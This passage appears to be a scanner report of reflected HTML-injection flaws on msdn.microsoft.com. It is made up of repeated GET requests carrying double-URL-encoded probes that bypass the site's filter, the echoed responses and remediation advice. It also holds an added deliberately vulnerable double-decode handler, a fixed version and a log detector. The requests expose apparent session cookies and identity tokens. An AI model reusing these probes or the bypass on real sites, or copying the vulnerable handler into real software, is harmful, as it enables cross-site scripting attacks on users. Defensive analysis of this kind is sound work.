msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9221 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:13:24 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library9ad5e"><a>9e2edfb91df/dd582937(office.11)" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58dea%2522%253e%253ca%253e93ab1411cb5 was submitted in the REST URL parameter 3. This input was echoed as 58dea"><a>93ab1411cb5 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/dd582937(office.11).aspx58dea%2522%253e%253ca%253e93ab1411cb5 HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9232 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:13:34 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/dd582937(office.11).aspx58dea"><a>93ab1411cb5" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4846e%2522%253e%253ca%253ed113f5f9538 was submitted in the REST URL parameter 1. This input was echoed as 4846e"><a>d113f5f9538 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us4846e%2522%253e%253ca%253ed113f5f9538/library/dd582938(office.11 HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9219 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:14:08 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us4846e"><a>d113f5f9538/library/dd582938(office.11" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f4c1%2522%253e%253ca%253ea9f77ed350d was submitted in the REST URL parameter 2. This input was echoed as 6f4c1"><a>a9f77ed350d in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
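The double-decode flaw described above and its fix, as an added example that is not part of this report or of the scanned application's code. The handler names, the blocked-character filter and the allow-list pattern are assumptions chosen to model the behaviour the report describes: the web server URL-decodes the path once, the application decodes it a second time, and the result is written into the double-quoted value attribute of the fromPage hidden input. The probe path is the one from the request below.

```python
import html
import re
from typing import Optional
from urllib.parse import unquote

# Assumption: the application's filter rejects these characters when it sees them
# in the once-decoded path. This models "attempts to block certain characters
# that are often used in XSS attacks".
BLOCKED_CHARS = set('<>"\'')

# Assumption: an allow-list for the REST URL parameters. Library paths such as
# /en-us/library/dd582938(office.11).aspx need nothing outside this set.
PATH_ALLOWED = re.compile(r"[A-Za-z0-9/()._-]*")

# The hidden input the report shows the value being echoed into.
HIDDEN_INPUT = '<input type="hidden" name="fromPage" value="{}" />'


def server_decode_once(raw_request_path: str) -> str:
    """The web server's own URL-decode: every %XX in the request line, exactly once."""
    return unquote(raw_request_path)


def encode_for_attribute(value: str) -> str:
    """HTML-attribute encoding: neutralises " < > & and ' so the value cannot
    close the attribute or start a tag."""
    return html.escape(value, quote=True)


def render_error_page_vulnerable(raw_request_path: str) -> Optional[str]:
    """Hypothetical vulnerable flow: filter the once-decoded value, then decode
    it again, then interpolate it raw into a double-quoted attribute."""
    path = server_decode_once(raw_request_path)
    if BLOCKED_CHARS & set(path):
        return None  # a single-encoded payload (%22%3e%3ca%3e) is caught here
    path = unquote(path)  # %2522 -> %22 -> " : the filter never saw this value
    return HIDDEN_INPUT.format(path)


def render_error_page_fixed(raw_request_path: str) -> Optional[str]:
    """Fixed flow: no second decode, validation after canonicalisation,
    and attribute encoding on output regardless of validation."""
    path = server_decode_once(raw_request_path)
    if PATH_ALLOWED.fullmatch(path) is None:
        return None  # %2522 survives one decode as %22, and % is not allowed
    return HIDDEN_INPUT.format(encode_for_attribute(path))


def attribute_was_broken_out_of(rendered: str) -> bool:
    """True when the echoed value closed value="..." early, i.e. anything other
    than the element's own closing '/>' follows the attribute's closing quote."""
    m = re.search(r'value="([^"]*)"(.*)$', rendered)
    return bool(m) and m.group(2).strip() != "/>"


if __name__ == "__main__":
    probe = "/en-us/library6f4c1%2522%253e%253ca%253ea9f77ed350d/dd582938(office.11"
    print("vulnerable:", render_error_page_vulnerable(probe))
    print("fixed:     ", render_error_page_fixed(probe))
    print("benign:    ", render_error_page_fixed("/en-us/library/dd582938(office.11"))
```

The vulnerable path reproduces the response shown below byte for byte: the once-decoded value contains only percent signs and hex, so the block-list passes it, and the second decode produces the `"><a>` sequence inside the attribute. The fixed path rejects the same probe because validation now runs on the canonical value, and even a value that slipped past the allow-list could not break out of the attribute once it has been encoded for that context.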
Request
GET /en-us/library6f4c1%2522%253e%253ca%253ea9f77ed350d/dd582938(office.11 HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9219 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:14:24 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library6f4c1"><a>a9f77ed350d/dd582938(office.11" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47a5b%2522%253e%253ca%253e22a3e17d330 was submitted in the REST URL parameter 3. This input was echoed as 47a5b"><a>22a3e17d330 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/dd582938(office.1147a5b%2522%253e%253ca%253e22a3e17d330 HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9219 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:14:37 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/dd582938(office.1147a5b"><a>22a3e17d330" /> ...[SNIP]...
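A detector for the probes shown in the requests above, as an added example rather than anything from the report or the scanned application. The access log is constructed in Common Log Format: three lines reuse request paths from the findings above, two are benign, and one of the benign lines carries a legitimate literal percent sign (%25) so that a naive "%25 means double encoding" rule would misfire. The detector decodes each request target until it stops changing and flags targets whose fully decoded form contains markup-breaking characters, recording whether a single decode (what the server and most filters perform) would have missed them.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple
from urllib.parse import unquote

# Constructed sample access log (Common Log Format). Lines 1-3 reuse request
# paths from the report's findings; lines 4-5 are benign traffic, and line 5
# contains a legitimate %25 that decodes to a plain percent sign.
SAMPLE_LOG = """\
203.0.113.7 - - [11/Dec/2010:18:14:24 +0000] "GET /en-us/library6f4c1%2522%253e%253ca%253ea9f77ed350d/dd582938(office.11 HTTP/1.1" 302 0
203.0.113.7 - - [11/Dec/2010:18:14:37 +0000] "GET /en-us/library/dd582938(office.1147a5b%2522%253e%253ca%253e22a3e17d330 HTTP/1.1" 302 0
203.0.113.7 - - [11/Dec/2010:17:55:28 +0000] "GET /en-usfeb63%2522%253e%253ca%253e27a0f0d059b/library/dd582938(office.11).aspx HTTP/1.1" 302 0
198.51.100.2 - - [11/Dec/2010:17:56:00 +0000] "GET /en-us/library/dd582938(office.11).aspx HTTP/1.1" 200 9206
198.51.100.2 - - [11/Dec/2010:17:56:01 +0000] "GET /search?q=100%25%20cotton HTTP/1.1" 200 512
"""

CLF_REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[0-9.]+"')
MARKUP_BREAKERS = set('<>"\'')


@dataclass
class Hit:
    line_no: int
    target: str
    decode_depth: int            # decode passes that changed the value
    hidden_by_second_pass: bool  # markup chars appear only after pass 2 or later
    decoded: str


def decode_until_stable(value: str, max_depth: int = 5) -> Tuple[str, int]:
    """URL-decode repeatedly until the value stops changing.
    Returns (fully decoded value, number of passes that changed it).
    urllib.parse.unquote leaves malformed %-sequences alone, so a value such as
    '100% cotton' is already stable and is not decoded a second time."""
    current, depth = value, 0
    while depth < max_depth:
        nxt = unquote(current)
        if nxt == current:
            break
        current, depth = nxt, depth + 1
    return current, depth


def scan_log(text: str) -> List[Hit]:
    """Flag requests whose fully decoded target contains markup-breaking
    characters. hidden_by_second_pass is True when the once-decoded target
    looked clean, which is the signature of the double-encoding bypass."""
    hits: List[Hit] = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        m = CLF_REQUEST.search(line)
        if not m:
            continue  # not a CLF request line; skip rather than guess
        target = m.group("target")
        decoded, depth = decode_until_stable(target)
        if not (MARKUP_BREAKERS & set(decoded)):
            continue
        once = unquote(target)
        hidden = depth >= 2 and not (MARKUP_BREAKERS & set(once))
        hits.append(Hit(line_no, target, depth, hidden, decoded))
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        tag = "DOUBLE-ENCODED" if hit.hidden_by_second_pass else "encoded"
        print(f"line {hit.line_no}: {tag} depth={hit.decode_depth} {hit.decoded}")
```

Keying the alert on the difference between the once-decoded and fully decoded forms, rather than on the presence of %25, keeps legitimate percent signs out of the results while still catching every probe above; single-encoded probes are reported too, with hidden_by_second_pass left False so they can be triaged separately.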
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload feb63%2522%253e%253ca%253e27a0f0d059b was submitted in the REST URL parameter 1. This input was echoed as feb63"><a>27a0f0d059b in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-usfeb63%2522%253e%253ca%253e27a0f0d059b/library/dd582938(office.11).aspx HTTP/1.1 Host: msdn.microsoft.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: MUID=34AD5BBBF6FC477CAC5139C76AA247F9; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; mcI=Sat, 06 Nov 2010 18:51:25 GMT; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=116E8h002j20101; ixpLightBrowser=1; viewkey=loband; __qca=P0-1185849018-1290642834531; __unam=289c965-12c804ebf38-f510776-6; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28
Response (redirected)
